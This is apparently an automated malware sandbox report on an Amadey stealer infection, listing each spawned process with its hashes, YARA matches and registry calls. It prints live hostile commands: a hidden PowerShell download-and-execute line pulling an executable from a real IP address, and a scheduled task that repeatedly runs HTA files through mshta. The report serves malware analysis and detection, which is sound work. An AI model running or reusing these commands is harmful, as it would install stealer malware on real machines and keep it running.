Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	04:08:25
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Imagebase:	0x80000
File size:	3'231'232 bytes
MD5 hash:	2314D4E1D1134D797121BF79B03C2A4C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000003E.00000002.2603863447.0000000000081000.00000040.00000001.01000000.00000015.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	04:08:27
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" "
Imagebase:	0x7ff780770000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	04:08:27
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	04:08:27
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" any_word
Imagebase:	0x7ff780770000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	04:08:27
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	04:08:28
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Imagebase:	0x7ff780770000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	04:08:28
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	04:08:30
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Imagebase:	0x7ff780770000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	04:08:30
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	04:08:31
Start date:	07/01/2025
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta "C:\Temp\.hta"
Imagebase:	0x7ff7b9d50000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	04:08:31
Start date:	07/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /delete /tn "AutoRunHTA" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	04:08:31
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	04:08:32
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	75
Start time:	04:08:32
Start date:	07/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	04:08:34
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Imagebase:	0x80000
File size:	3'231'232 bytes
MD5 hash:	2314D4E1D1134D797121BF79B03C2A4C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000004C.00000002.2707806228.0000000000081000.00000040.00000001.01000000.00000015.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	04:08:36
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe"
Imagebase:	0x400000
File size:	93'696 bytes
MD5 hash:	4D140076DE73C646ABAC6DF1FE85851C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	04:08:36
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	04:08:36
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\E870.tmp\E871.tmp\E881.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe"
Imagebase:	0x7ff780770000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	80
Start time:	04:08:36
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe" any_word
Imagebase:	0x7ff780770000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	81
Start time:	04:08:36
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	82
Start time:	04:08:36
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word
Imagebase:	0x400000
File size:	93'696 bytes
MD5 hash:	4D140076DE73C646ABAC6DF1FE85851C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	83
Start time:	04:08:36
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\E9E7.tmp\E9E8.tmp\E9E9.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word"
Imagebase:	0x7ff780770000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	84
Start time:	04:08:36
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Imagebase:	0x7ff780770000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	85
Start time:	04:08:36
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	86
Start time:	04:08:38
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Imagebase:	0x7ff780770000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	87
Start time:	04:08:38
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	88
Start time:	04:08:41
Start date:	07/01/2025
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta "C:\Temp\.hta"
Imagebase:	0x7ff7b9d50000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	89
Start time:	04:08:41
Start date:	07/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /delete /tn "AutoRunHTA" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	90
Start time:	04:08:41
Start date:	07/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	91
Start time:	04:08:41
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	92
Start time:	04:08:41
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	93
Start time:	04:08:42
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Imagebase:	0x80000
File size:	3'231'232 bytes
MD5 hash:	2314D4E1D1134D797121BF79B03C2A4C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000005D.00000002.2891041549.0000000000081000.00000040.00000001.01000000.00000015.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	94
Start time:	04:08:44
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Imagebase:	0x80000
File size:	3'231'232 bytes
MD5 hash:	2314D4E1D1134D797121BF79B03C2A4C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000005E.00000002.2799418989.0000000000081000.00000040.00000001.01000000.00000015.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	95
Start time:	04:08:44
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" "
Imagebase:	0x7ff780770000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	96
Start time:	04:08:44
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	97
Start time:	04:08:45
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" any_word
Imagebase:	0x7ff780770000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	98
Start time:	04:08:45
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	99
Start time:	04:08:45
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Imagebase:	0x7ff780770000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	100
Start time:	04:08:45
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	101
Start time:	04:08:47
Start date:	07/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Imagebase:	0x7ff780770000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	102
Start time:	04:08:47
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	103
Start time:	04:08:47
Start date:	07/01/2025
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta "C:\Temp\.hta"
Imagebase:	0x7ff7b9d50000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	104
Start time:	04:08:47
Start date:	07/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /delete /tn "AutoRunHTA" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	105
Start time:	04:08:48
Start date:	07/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	106
Start time:	04:08:48
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	107
Start time:	04:08:48
Start date:	07/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	127
Start time:	04:08:56
Start date:	07/01/2025
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	129
Start time:	04:08:56
Start date:	07/01/2025
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	4.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.2%
Total number of Nodes:	634
Total number of Limit Nodes:	23

Executed Functions

Function 00F65C83 Relevance: 20.8, APIs: 3, Strings: 8, Instructions: 1535registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,599E98B4,599E98B4), ref: 00F65DCC
RegQueryValueExA.KERNEL32(599E98B4,?,00000000,00000000,?,00000400,?,?,00000000,00000001,599E98B4,599E98B4), ref: 00F65DFA
RegCloseKey.KERNEL32(599E98B4,?,?,00000000,00000001,599E98B4,599E98B4), ref: 00F65E06

Strings

VUUU, xrefs: 00F66F41
00000422, xrefs: 00F660C9
invalid stoi argument, xrefs: 00F67090
0000043f, xrefs: 00F6612B
00000419, xrefs: 00F66098
00000423, xrefs: 00F660FA
Keyboard Layout\Preload, xrefs: 00F66054
stoi argument out of range, xrefs: 00F67081

Memory Dump Source

Source File: 00000000.00000002.1849527543.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1849511119.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849527543.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849588698.0000000000FC9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849606165.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849625080.0000000000FD7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849719342.0000000001139000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849736483.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849753178.0000000001158000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849783740.000000000115A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849797104.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849810830.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849826204.000000000115F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849839876.0000000001160000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849853953.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849872521.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849889620.0000000001171000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849903660.0000000001172000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849918130.0000000001173000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849936867.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849951682.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849967558.0000000001194000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1849982392.000000000119E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850007400.00000000011C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850027159.00000000011C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850046839.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850068125.00000000011CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850087065.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850122696.00000000011D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850143508.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850164141.00000000011DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850188775.00000000011E1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850214649.00000000011E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850248657.00000000011EC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850270505.00000000011F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850296240.00000000011F8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850321794.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850342222.0000000001203000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1850359936.0000000001205000.00000040.00000001.01000000.00000003.sdmpDownload File
